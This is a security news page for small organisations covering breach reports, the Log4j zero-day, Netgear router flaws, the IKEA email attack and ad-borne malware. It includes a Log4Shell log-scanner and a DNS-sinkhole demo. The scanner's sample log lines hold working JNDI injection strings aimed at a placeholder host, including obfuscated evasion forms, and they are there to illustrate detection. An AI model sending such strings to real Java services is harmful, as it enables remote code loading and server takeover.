News

Trellix Threat Report, Summer 2022

July 18, 2022: Trellix, a cybersecurity company, announced the release of its Threat Report: Summer 2022.

The analysis covers healthcare, access control systems and email phishing trends, and details the evolution of Russian cybercrime related to the conflict in Ukraine, where no new malware or methods had yet been observed. Key findings interpret data showing increased threats to business services, the evolution of ransomware, and telling trends in email security.

The report is free. You can view and download the report here.

The Threat Report: Summer 2022 leverages proprietary data from Trellix’s network of over one billion sensors, open-source intelligence and Trellix Threat Labs investigations into prevalent threats like ransomware and nation-state activity. Telemetry related to detection of threats is used for the purposes of this report. A detection is when a file, URL, IP-address, suspicious email, network behavior or other indicator is detected and reported via the Trellix XDR ecosystem.

2021 IBM Cost of a Data Breach Report is now available

You can download the report for free, but they do require your contact information.

https://www.ibm.com/security/data-breach

In addition to a fine cost analysis, the report also summarizes data on initial attack vectors that were primarily responsible for causing the breaches, and the length of time it took the organizations to detect and contain their breaches.

Key points and updates for SMBs:

  • Cloud security efforts and management are essential;
  • 20% (1 in 5) of breaches were caused by compromised credentials, the most common initial attack vector;
  • Overall, it took an average of 287 days to identify and contain a data breach, seven days longer than in 2020;
  • Customer PII (Personally Identifiable Information) was both the costliest record type in a breach (avg. $180 per record) and the most frequently breached (present in 44% of breaches).

IBM uses the following four cost centers to calculate the cost of a breach:

Detection and escalation
— Forensic and investigative activities
— Assessment and audit services
— Crisis management
— Communications to executives and boards

Notification
— Emails, letters, outbound calls or general notice to data subjects
— Determination of regulatory requirements
— Communication with regulators
— Engagement of outside experts

Lost business
— Business disruption and revenue losses from system downtime
— Cost of lost customers and acquiring new customers
— Reputation losses and diminished goodwill

Post-breach response
— Help desk and inbound communications
— Credit monitoring and identity protection services
— Issuing new accounts or credit cards
— Legal expenditures
— Product discounts
— Regulatory fines

Lost business was the largest cost, averaging 38% of total cost of an incident.

Members can keep watch for updates to the SOISA Playbook templates for simple actions for SMBs to take to become more secure.

Java zero-day exploit in log4j may affect your infrastructure

DATELINE: Monday, December 13, 2021

UPDATE: Monday, January 10, 2022 - The Log4j Zero-Day Vulnerability Response page at the Center for Internet Security has updated fixes.

An alert went out to SOISA members regarding a zero-day exploit that has affected Cisco appliances, software, and network management tools as well as hundreds of other applications and thousands of servers.
Apple, Microsoft, and many services, games, and network monitoring systems are affected, with more to be discovered over the coming days and weeks, no doubt.

If you have a cybersecurity service, then they already know about this. You might want to ask if they can run deep scans through your internal network systems both to check for the vulnerability and to check for evidence of compromise and post-exploitation activity on your network. If you don't have a cybersecurity service for your company, you will want to ask your cyber/IT staff or contractors to quickly check your systems (see resources below) and take appropriate measures to mitigate and remediate.

This is a big zero-day. For example, it can be used to take complete control of a Minecraft server, and of the computers of the players connected to it, with a single chat message. Since many IT staff and cloud services run Minecraft servers on spare machines, at home, or on developer boxes, this is just one example of how the vulnerability can be used to quickly penetrate home and corporate networks through a "side door". The Cisco systems vulnerabilities have even more devastating potential. Fortunately, the infosec community and IT professionals are acting quickly to provide free scanning tools, security system rules, and more to help.

Cisco Systems Vulnerability Advisory
A fully automated, accurate, and extensive scanner to find log4j-vulnerable systems
Rules and Methods of Post-Exploitation Network Activity Detection by NCC Group
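As an added illustration (not part of the original alert, and not code from any of the tools linked above), here is a small Python scanner that looks through web-server access-log lines for Log4Shell exploitation attempts. A plain search for the string "jndi:" misses the nested-lookup obfuscation attackers started using within hours of disclosure (forms such as ${${lower:j}ndi:...}, ${::-j} and ${env:NOPE:-j}), so the script first reduces those lookups the way Log4j's own string substitution would, and only then matches. The log lines and the 203.0.113.x addresses are constructed sample data.

```python
import re

# Innermost ${...} lookup with no nested braces inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: ${jndi:<scheme>://<host[:port]>...
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)

# Constructed sample access-log lines (not real traffic). Line 1 is benign; the
# others carry the same exploit in progressively more obfuscated forms.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.66:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:14:09 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.66:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:10:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.66:1099/c}"',
    '203.0.113.9 - - [10/Dec/2021:10:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.66/d}"',
]


def reduce_lookup(body):
    """Statically resolve one innermost lookup body to the text Log4j would substitute.

    Returns None when the lookup is not one of the obfuscation idioms we can
    resolve without a running JVM. The jndi lookup itself is deliberately left
    alone so that it survives normalization and can be matched.
    """
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # Default-value syntax: ${env:NOPE:-j} is "j" when NOPE is unset,
        # and the degenerate ${::-j} is always "j".
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_passes=32):
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_passes):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = reduce_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi_attempts(lines):
    """Return (line_number, scheme, target) for every JNDI lookup found after normalization."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(normalize(line)):
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for number, scheme, target in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {number}: jndi lookup via {scheme} to {target}")
```

Two caveats for anyone running something like this. First, it only sees what the web server logged: the payload can arrive in any field the Java application passes to Log4j (User-Agent, X-Forwarded-For, custom headers, login form fields), so run it over application logs as well as access logs. Second, a hit is an attempt, not a confirmed compromise; confirming success means looking for the outbound LDAP, RMI or DNS connection from the server to the target host, which is what the NCC Group detection rules above are for.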

UPDATE: The CISA page on log4j vulnerability guidance is recommended for the latest information and mitigations.

We give our thanks and kudos to the professionals and groups that have provided such quick response, generosity, and dedication to the cause!

Thousands of Netgear Wi-Fi routers need to be patched now — here's how

35 models need urgent updates

British security firm Immersive Labs has discovered three flaws that affect thousands of Netgear routers. Together they allow an attacker who can reach the router's admin interface to gain full control of the router. That is an obvious tool for attackers doing lateral movement inside a network, but many companies have also configured their routers to expose the administration interface to the Internet at large in order to enable remote management, thinking it secure enough.

Upgrade now. This article over at Tom's Guide shows you how and gives all the models of affected routers.

IKEA cyberattacked via compromised organizations and partners

Small and medium businesses often wonder why they would be the targets of a cyber attack when they hold little or no "valuable" data, don't have loads of cash for ransoms, and don't have cyber insurance (to fund ransom payments). The answer is that SMB networks and accounts are used to launch further attacks on large organizations. Those organizations have beefed up the cybersecurity of their servers and network connections, and thus can often thwart or defend against direct, front-door cyber attacks.

So now cyber adversaries are using trusted connections between vendors and partner companies to get their malware and phishing emails past the cyber defenses. And they want your network and accounts so that they can do that.

News Article, November 26, 2021: IKEA email systems hit by ongoing cyberattack

The above article describes exactly what this kind of attack looks like.

Take action today: learn more about cybersecurity for your organization.

Protecting your organization against malware via web ads

Over the years, delivering advertisements to web pages has become a major source of revenue for web site operators, especially social media sites. The entire business plan and revenue stream for sites like Facebook is based on delivering targeted ads to users via their browser, phone, or tablet computer. Billions of ads are served each year.

Unfortunately, malware can be and is being delivered via these ads. Sophisticated JavaScript and other browser tricks are used to deposit malware on users' devices with nary a click needed. The malware can spy on users, read browser history, lift passwords and logins stored in the browser, intercept logins to other sites and copy the credentials, open pages and perform clicks in the background, and even redirect users to different websites that look real. Browser companies try to keep up with the crafty attacks, but so far have had limited success. Several of the big browsers have taken the route of becoming spies and traffic interceptors themselves in the name of protecting users, which, in a way, just moves the problem.

The NSA, CIA, FBI, DHS, and other agencies in the US Intelligence community use ad-blockers to combat the problem. Your organization should, too.

The costs of a single malware or ransomware attack now average over a million dollars for small and medium-sized organizations. Due to the shifting cyber attack landscape, the real choice SMBs face now is: do I allow an open, known avenue of attack to operate on my organization's computers and possibly infect my network, workstations, and laptops with ransomware and malware, or do I deny a content site the few cents it would gain by casting an ad onto my screen? Most ads aren't malicious. Of course, some of them are, and the problem has been getting worse.

Until advertising networks and browser platforms can provide a completely safe and secure ad delivery mechanism that can't be abused by malicious actors to infect user browsers and machines, organizations simply cannot be expected to risk accepting these adverts. It's a shame that many good content and service providers will suffer from this. This is just one of the costs inflicted by cyber attackers and foreign agents.

Options for protecting your organization's network include using a Pi-hole -- software that blocks requests for the adverts and automatically updates the lists of ad servers and files -- or using a set of ad-blocker and security extensions on all of your organization's machines and devices. Check our membership content for TechKits for both of these options, or do web searches to learn more.
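To show concretely what "blocks requests for the adverts" means at the DNS layer, here is an added Python sketch (not Pi-hole's code, and not from the original page) of the decision a DNS sinkhole makes for every query: load a hosts-format blocklist plus a few regex entries, answer blocked names with 0.0.0.0, and pass everything else to the upstream resolver. The list contents, the regexes and the example-ads.net / example-metrics.com / doubleclick-like.example names are constructed for the example; treat the matching rules as an assumption about the general approach rather than a description of Pi-hole's exact behaviour.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, List, Set

# Constructed sample in the hosts-file format that most published ad/tracker
# lists use. Not a real list; the domains are invented for this example.
SAMPLE_BLOCKLIST = """\
# Sample ad/tracker list (constructed, not a real published list)
0.0.0.0 ads.example-ads.net
0.0.0.0 cdn.example-ads.net
0.0.0.0 tracker.example-metrics.com   # inline comment
127.0.0.1 localhost
"""

# Constructed regex entries, the form a wildcard/regex blacklist takes.
SAMPLE_REGEX = [
    r"(^|\.)doubleclick-like\.example$",  # the domain and every subdomain of it
    r"^ad[sv]?[0-9]*\.",                  # hostnames beginning ads., adv3., ad1.
]

SINKHOLE = "0.0.0.0"  # answer returned for blocked names


@dataclass
class Blocklist:
    exact: Set[str] = field(default_factory=set)
    regexes: List[re.Pattern] = field(default_factory=list)

    @classmethod
    def load(cls, hosts_text: str, regex_lines: List[str]) -> "Blocklist":
        bl = cls()
        for raw in hosts_text.splitlines():
            line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
            if not line:
                continue
            # hosts format: "<ip> <name> [<name> ...]"; the IP column is ignored
            for name in line.split()[1:]:
                if "." in name:  # skip bare entries such as localhost
                    bl.exact.add(name.lower().rstrip("."))
        bl.regexes = [re.compile(r, re.IGNORECASE) for r in regex_lines]
        return bl

    def is_blocked(self, qname: str) -> bool:
        # DNS names are case-insensitive and may arrive as an FQDN with a trailing dot
        name = qname.lower().rstrip(".")
        if name in self.exact:
            return True
        return any(rx.search(name) for rx in self.regexes)


def resolve(bl: Blocklist, qname: str, upstream: Callable[[str], str]) -> str:
    """Answer one query: sinkhole it if blocked, otherwise ask the upstream resolver."""
    return SINKHOLE if bl.is_blocked(qname) else upstream(qname)


if __name__ == "__main__":
    bl = Blocklist.load(SAMPLE_BLOCKLIST, SAMPLE_REGEX)
    fake_upstream = lambda q: "198.51.100.7"  # stand-in for a real forwarder
    for q in ["www.example.org", "cdn.example-ads.net", "x.doubleclick-like.example",
              "adv3.example.org", "ad.example.org"]:
        print(f"{q:32} -> {resolve(bl, q, fake_upstream)}")
```

Note the trade-off the regex entries introduce: ^ad[sv]?[0-9]*\. catches ads.*, adv3.* and so on, but it also sinkholes an innocuous ad.example.org. Exact-match lists are safe but only as complete as their maintainers; regex entries widen coverage at the cost of false positives, so keep an allowlist and test any list against your own SaaS and vendor domains before rolling it out. A DNS sinkhole also cannot touch ads served from the same domain as the content (a social network's own servers, for instance), which is why the page pairs it with browser-side ad-blocker extensions.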


SMB Stats (2019): 43% of successful cyber attacks involve small organizations

The Verizon 2019 Data Breach Investigations Report has the latest figures, and small businesses and organizations have recently become bigger targets.

43% of the breaches in 2018 involved small businesses or organizations.

With big businesses ramping up their cyber security defenses, small organizations have become the new low-hanging fruit for hackers. It isn't always for money or data; many times it is to gain access through your business computers and infrastructure: not only do attackers get access to the business's vendor accounts, they can use the business's computers and assets to launch attacks while their own identity stays hidden.

It's more important than ever that small organizations make cyber security part of their normal business practices. You don't have to spend a lot of money on fancy software and appliances: most of the breaches into small organizations were because of misconfigurations, simple and re-used passwords, and failure to patch systems with updates. Simple, regular attention to a few details can move your organization out of the low-hanging-fruit zone.

That's where SOISA comes in. We develop and share specific, simple, actionable cybersecurity information that is tailored for small organizations, helping each other and spreading the costs over many members. This makes quality, tailored information affordable and timely.